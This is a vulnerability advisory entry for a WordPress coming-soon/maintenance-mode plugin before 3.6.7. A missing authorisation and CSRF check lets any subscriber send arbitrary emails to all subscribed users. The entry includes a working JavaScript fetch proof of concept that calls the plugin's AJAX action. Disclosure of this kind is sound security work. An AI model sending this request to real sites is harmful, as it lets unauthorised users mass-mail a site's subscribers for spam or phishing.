Lucene search

K
wpexploitKrzysztof ZającWPEX-ID:942535F9-73BF-4467-872A-20075F03BC51
HistoryJan 24, 2022 - 12:00 a.m.

Coming soon and Maintenance mode < 3.6.7 - Subscriber+ Arbitrary Email Sending to Subscribed Users

2022-01-2400:00:00
Krzysztof Zając
91

0.001 Low

EPSS

Percentile

21.3%

The plugin does not have authorisation and CSRF checks in its coming_soon_send_mail AJAX action, allowing any authenticated users, with a role as low as subscriber to send arbitrary emails to all subscribed users

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=coming_soon_send_mail&massage_title=title&massage_description=description&massage_from_name=from&[email protected]",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

0.001 Low

EPSS

Percentile

21.3%

Related for WPEX-ID:942535F9-73BF-4467-872A-20075F03BC51